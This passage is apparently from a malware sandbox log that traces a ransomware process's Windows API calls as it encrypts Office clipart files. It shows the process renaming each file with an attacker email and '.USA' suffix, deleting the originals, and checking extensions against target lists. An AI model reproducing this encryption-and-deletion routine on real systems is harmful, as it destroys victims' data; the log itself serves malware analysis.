(lpString="FD00775_.WMF") returned 12 [0271.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.478] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=11152) returned 1 [0271.478] CloseHandle (hObject=0x380) returned 1 [0271.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf")) returned 0x20 [0271.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.478] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.478] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.479] GetLastError () returned 0x0 [0271.479] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x2b90, lpOverlapped=0x0) returned 1 [0271.528] WriteFile (in: hFile=0x390, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x2ba0, lpOverlapped=0x0) returned 1 [0271.529] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.529] WriteFile (in: hFile=0x390, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.529] SetEndOfFile (hFile=0x390) returned 1 [0271.529] CloseHandle (hObject=0x390) returned 1 [0271.529] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.529] SetEndOfFile (hFile=0x380) returned 1 [0271.531] CloseHandle (hObject=0x380) returned 1 [0271.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.532] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf")) returned 1 [0271.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.547] lstrlenW (lpString=".doc") returned 4 [0271.547] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.547] lstrlenW (lpString=".docx") returned 5 [0271.547] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.547] lstrlenW (lpString=".pdf") returned 4 [0271.555] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.555] lstrlenW (lpString=".xls") returned 4 [0271.557] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.557] lstrlenW (lpString=".xlsx") returned 5 [0271.557] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.557] lstrlenW (lpString=".ppt") returned 4 [0271.557] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.566] lstrlenW (lpString=".zip") returned 4 [0271.566] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.573] lstrlenW (lpString=".rar") returned 4 [0271.573] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.574] lstrlenW (lpString=".bz2") returned 4 [0271.574] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.574] lstrlenW (lpString=".7z") returned 3 [0271.574] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.574] lstrlenW (lpString=".dbf") returned 4 [0271.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.575] lstrlenW (lpString=".1cd") returned 4 [0271.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.575] lstrlenW (lpString=".jpg") returned 4 [0271.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.575] lstrlenW (lpString=".doc") returned 4 [0271.575] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString=".docx") returned 5 [0271.575] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.575] lstrlenW (lpString=".pdf") returned 4 [0271.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString=".xls") returned 4 [0271.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.575] lstrlenW (lpString=".xlsx") returned 5 [0271.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.575] lstrlenW (lpString=".ppt") returned 4 [0271.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.575] lstrlenW (lpString=".zip") returned 4 [0271.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.575] lstrlenW (lpString=".rar") returned 4 [0271.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString=".bz2") returned 4 [0271.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.575] lstrlenW (lpString=".7z") returned 3 [0271.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.575] lstrlenW (lpString=".dbf") returned 4 [0271.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.576] lstrlenW (lpString=".1cd") returned 4 [0271.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63 [0271.576] lstrlenW (lpString=".jpg") returned 4 [0271.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.576] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.576] lstrlenW (lpString="FD01176_.WMF") returned 12 [0271.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.576] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=4984) returned 1 [0271.576] CloseHandle (hObject=0x388) returned 1 [0271.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf")) returned 0x20 [0271.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.577] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.577] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.577] GetLastError () returned 0x0 [0271.577] ReadFile (in: hFile=0x388, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x1378, lpOverlapped=0x0) returned 1 [0271.588] WriteFile (in: hFile=0x394, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1380, lpOverlapped=0x0) returned 1 [0271.589] ReadFile (in: hFile=0x388, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.589] WriteFile (in: hFile=0x394, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.589] SetEndOfFile (hFile=0x394) returned 1 [0271.589] CloseHandle (hObject=0x394) returned 1 [0271.589] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.589] SetEndOfFile (hFile=0x388) returned 1 [0271.591] CloseHandle (hObject=0x388) returned 1 [0271.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.592] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf")) returned 1 [0271.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.592] lstrlenW (lpString=".doc") returned 4 [0271.592] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.592] lstrlenW (lpString=".docx") returned 5 [0271.592] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.592] lstrlenW (lpString=".pdf") returned 4 [0271.592] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.592] lstrlenW (lpString=".xls") returned 4 [0271.592] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.592] lstrlenW (lpString=".xlsx") returned 5 [0271.592] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.592] lstrlenW (lpString=".ppt") returned 4 [0271.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.592] lstrlenW (lpString=".zip") returned 4 [0271.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.592] lstrlenW (lpString=".rar") returned 4 [0271.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.592] lstrlenW (lpString=".bz2") returned 4 [0271.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString=".7z") returned 3 [0271.593] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.593] lstrlenW (lpString=".dbf") returned 4 [0271.593] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.593] lstrlenW (lpString=".1cd") returned 4 [0271.593] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.593] lstrlenW (lpString=".jpg") returned 4 [0271.593] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.593] lstrlenW (lpString=".doc") returned 4 [0271.593] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString=".docx") returned 5 [0271.593] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.593] lstrlenW (lpString=".pdf") returned 4 [0271.593] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString=".xls") returned 4 [0271.593] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.593] lstrlenW (lpString=".xlsx") returned 5 [0271.593] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.593] lstrlenW (lpString=".ppt") returned 4 [0271.593] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.593] lstrlenW (lpString=".zip") returned 4 [0271.593] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.593] lstrlenW (lpString=".rar") returned 4 [0271.593] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.594] lstrlenW (lpString=".bz2") returned 4 [0271.594] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.594] lstrlenW (lpString=".7z") returned 3 [0271.594] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.594] lstrlenW (lpString=".dbf") returned 4 [0271.594] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.594] lstrlenW (lpString=".1cd") returned 4 [0271.594] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63 [0271.594] lstrlenW (lpString=".jpg") returned 4 [0271.594] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.594] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.594] lstrlenW (lpString="FD01193_.WMF") returned 12 [0271.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.612] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1160) returned 1 [0271.612] CloseHandle (hObject=0x380) returned 1 [0271.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf")) returned 0x20 [0271.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.615] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.615] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.615] GetLastError () returned 0x0 [0271.615] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x488, lpOverlapped=0x0) returned 1 [0271.617] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x490, lpOverlapped=0x0) returned 1 [0271.617] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.617] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.618] SetEndOfFile (hFile=0x3a8) returned 1 [0271.618] CloseHandle (hObject=0x3a8) returned 1 [0271.618] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.618] SetEndOfFile (hFile=0x380) returned 1 [0271.621] CloseHandle (hObject=0x380) returned 1 [0271.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.621] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf")) returned 1 [0271.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.622] lstrlenW (lpString=".doc") returned 4 [0271.622] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.622] lstrlenW (lpString=".docx") returned 5 [0271.622] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.622] lstrlenW (lpString=".pdf") returned 4 [0271.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.622] lstrlenW (lpString=".xls") returned 4 [0271.622] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.622] lstrlenW (lpString=".xlsx") returned 5 [0271.622] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.622] lstrlenW (lpString=".ppt") returned 4 [0271.622] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.623] lstrlenW (lpString=".zip") returned 4 [0271.623] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.623] lstrlenW (lpString=".rar") returned 4 [0271.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString=".bz2") returned 4 [0271.623] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString=".7z") returned 3 [0271.623] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.623] lstrlenW (lpString=".dbf") returned 4 [0271.623] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.623] lstrlenW (lpString=".1cd") returned 4 [0271.623] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.623] lstrlenW (lpString=".jpg") returned 4 [0271.623] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.623] lstrlenW (lpString=".doc") returned 4 [0271.623] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString=".docx") returned 5 [0271.623] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.623] lstrlenW (lpString=".pdf") returned 4 [0271.623] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.623] lstrlenW (lpString=".xls") returned 4 [0271.623] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.623] lstrlenW (lpString=".xlsx") returned 5 [0271.624] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.624] lstrlenW (lpString=".ppt") returned 4 [0271.624] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.624] lstrlenW (lpString=".zip") returned 4 [0271.624] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.624] lstrlenW (lpString=".rar") returned 4 [0271.624] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.624] lstrlenW (lpString=".bz2") returned 4 [0271.624] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.624] lstrlenW (lpString=".7z") returned 3 [0271.624] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.624] lstrlenW (lpString=".dbf") returned 4 [0271.624] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.624] lstrlenW (lpString=".1cd") returned 4 [0271.624] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63 [0271.624] lstrlenW (lpString=".jpg") returned 4 [0271.624] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.624] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.624] lstrlenW (lpString="FD01196_.WMF") returned 12 [0271.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.625] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2332) returned 1 [0271.625] CloseHandle (hObject=0x380) returned 1 [0271.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 